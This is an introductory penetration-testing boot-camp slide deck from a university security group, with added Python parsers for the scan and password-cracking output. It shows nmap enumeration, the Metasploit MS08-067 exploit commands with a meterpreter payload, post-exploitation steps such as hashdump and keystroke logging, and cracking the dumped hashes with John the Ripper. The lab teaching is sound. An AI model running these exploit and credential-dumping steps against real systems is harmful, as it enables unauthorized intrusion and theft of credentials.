Penetration Testing 101 (Boot-camp)


1 Penetration Testing 101 (Boot-camp)
Computer Security Group
Mitchell Adair
utdcsg.org

2 Outline
"Interactive" meeting
Introduction to Backtrack
A mini penetration test
  Scenario
  Methodology
  Enumeration, Exploitation, Post Exploitation
  Exercise
Summary
Resources

3 Scenario
Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

4 Outline
Enumeration
  OS, services, versions, filters
Exploitation
  Match a service + version to a known vulnerability
  Exploit, getting shell access to the box
Post Exploitation
  Shell is just the beginning... ;)
  Hashes, SSH / GPG keys, pivot, ...

5 Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
Scan Types
  -sS, SYN
  -sT, Connect
  -sA, ACK
Options
  -O, OS detection
  -sV, service/version detection
  -v, verbose

6 ... Enumeration
nmap 192.168.1.1
  Default scan, full SYN, top 1000 ports
nmap -v -sV -O 192.168.1.1 -p 1-65535
  Verbose, services, OS, ports 1 through 65535
nmap -PN --script=smb* -sV -O
  Don't ping, run all smb* scripts, service, OS

7 Nmap Output
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
| smb-check-vulns:
|_  MS08-067: VULNERABLE
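The scan output above is what the rest of the walkthrough acts on, so it helps to see how a reviewer turns it into findings. The following Python script is an added example (not part of the slides and not an nmap feature): it parses nmap's normal text output, pulls out the open ports with their service/version strings and the OS fingerprint, and flags any NSE check that reports VULNERABLE, so that the same scan a tester runs can feed a patch list for the defending side. The sample input is an abridged copy of the slide's output, embedded so the script runs offline.

```python
"""Triage helper for nmap normal (text) output.

Added example for this transcript; not part of the original slides or of nmap.
It reads the "PORT STATE SERVICE VERSION" table and the "Host script results"
block that nmap prints and produces a short findings list a defender can act on.
"""
import re

# Sample input, abridged from the nmap output shown on the slide above.
SAMPLE = """\
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# One row of the port table: "445/tcp  open  microsoft-ds  <optional version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# A script result line whose value is VULNERABLE, e.g. "|_  MS08-067: VULNERABLE"
VULN_RE = re.compile(r"^\|_?\s*(\S+):\s*VULNERABLE\b")


def parse_nmap(text):
    """Return (ports, os_details, vulns) parsed from nmap's text output."""
    ports, vulns, os_details = [], [], None
    in_scripts = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": (version or "").strip()})
            continue
        if line.startswith("OS details:"):
            os_details = line.split(":", 1)[1].strip()
        elif line.startswith("Host script results:"):
            in_scripts = True
        elif in_scripts:
            v = VULN_RE.match(line)
            if v:
                vulns.append(v.group(1))
    return ports, os_details, vulns


def triage(text):
    """Build the findings list for one host: fingerprint, exposure, patch items."""
    ports, os_details, vulns = parse_nmap(text)
    open_ports = [p for p in ports if p["state"] == "open"]
    findings = []
    if os_details:
        findings.append(f"OS fingerprint: {os_details}")
    for p in open_ports:
        findings.append(f"open {p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip())
    # An exposed SMB port combined with a VULNERABLE script result is the
    # condition the next slide exploits, so it goes out as the top-priority item.
    smb_exposed = any(p["port"] == 445 for p in open_ports)
    for v in vulns:
        item = f"PATCH NOW: {v} reported VULNERABLE"
        if smb_exposed:
            item += " (SMB reachable on 445/tcp)"
        findings.append(item)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Run it against a saved `nmap -oN` file by replacing SAMPLE with the file's contents; the regexes only cover the normal output format, so use nmap's XML output (`-oX`) with a real XML parser when the report has to survive formatting changes between nmap versions.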

8 Exploitation
Metasploit – Penetration Testing Framework
  tools, libraries, modules, and user interfaces
# msfconsole
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST
set PAYLOAD windows/meterpreter/bind_tcp
exploit

9 Post Exploitation
Gather useful information
  SSH & GPG keys, hashes, etc...
  Meterpreter "post" modules
Pivot
meterpreter > hashdump
  sysinfo
  keyscan_(start | stop | dump)
  download
  migrate
  shell

10 ... Post Exploitation
We dumped the hashes... now what?
  Pass the hash
  Crack the hash
John the Ripper
  a tool to find weak passwords of your users
  john [options] password-files
    --wordlist
    --users, --groups
    --session, --restore

11 ... Post Exploitation
john --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC              (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN            (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s:  trying: SKIDOO - ZHONGGU
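Two things in that output deserve a closer look when writing up the result for Company X: the empty entry for Guest is an account with no password at all, and the `webmaster:1` / `webmaster:2` pair is how John reports an LM hash, which stores a password as two independent 7-character halves (upper-cased, so the recovered text may differ in case from what the user typed). The Python script below is an added example, not part of the slides or of John the Ripper: it reads lines in the `PASSWORD (user)` shape shown above, joins LM halves back into one password per account, and produces the per-account report an auditor needs to decide which passwords must be reset. The sample lines are constructed from the slide's output.

```python
"""Turn John the Ripper's cracked-password lines into an account report.

Added example for this transcript; not part of the slides or of John itself.
LM hashes split a password into two 7-character halves, which John reports as
user:1 and user:2; this report joins them so the auditor sees the whole
password and which accounts are empty.
"""
import re

# Constructed sample, one cracked entry per line as john prints them.
# The leading whitespace on the Guest line means an empty password.
SAMPLE = """\
ABC              (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN            (Administrator)
"""

# "<password>   (<user>)" or "<password>   (<user>:<half>)" for LM halves
LINE_RE = re.compile(r"^(\S*)\s+\((?P<user>[^:)]+)(?::(?P<half>[12]))?\)\s*$")


def parse_john(text):
    """Map each user to either {"password": ...} or {"halves": {1: ..., 2: ...}}."""
    cracked = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # status lines such as "Loaded 6 password hashes ..."
        password, user, half = m.group(1), m.group("user"), m.group("half")
        entry = cracked.setdefault(user, {})
        if half:
            entry.setdefault("halves", {})[int(half)] = password
        else:
            entry["password"] = password
    return cracked


def weak_accounts(text):
    """Per-account report: recovered password, status, and how it was recovered."""
    report = {}
    for user, entry in parse_john(text).items():
        halves = entry.get("halves")
        if halves:
            # Both halves known: the full LM password is recovered. Only the
            # first half known: the password is at most 7 characters long.
            password = halves.get(1, "") + halves.get(2, "")
            note = "LM halves joined" if 2 in halves else "LM, first half only"
        else:
            password = entry.get("password", "")
            note = "single hash"
        # Anything john recovered from a wordlist is by definition weak;
        # an empty recovered password is the worst case.
        status = "EMPTY" if password == "" else "WEAK"
        report[user] = {"password": password, "status": status, "note": note}
    return report


if __name__ == "__main__":
    for user, info in weak_accounts(SAMPLE).items():
        print(f"{user:15} {info['status']:6} {info['password']!r:14} {info['note']}")
```

Because LM halves are cracked independently, a 10-character password like the one shown above costs no more to recover than two short ones; the practical mitigation the report should recommend is disabling LM hash storage and enforcing a minimum length that forces NT-only hashes.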

12 So... let's get started
Boot up to your Backtrack CD
passwd
/etc/init.d/networking start
startx
Follow along... let's pwn this box :)

13 Summary
Clearly... Company X's default user workstations need some work.
Now let's do the paperwork!... just kidding ;)
Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process.
Feedback is always appreciated!

14 Resources
utdcsg.org
  Presentations, articles, resources, etc.
IRC
  irc.oftc.net, #utdcsg
Nmap - nmap.org/5/
Metasploit - metasploit.com/
John the Ripper - openwall.com/john/

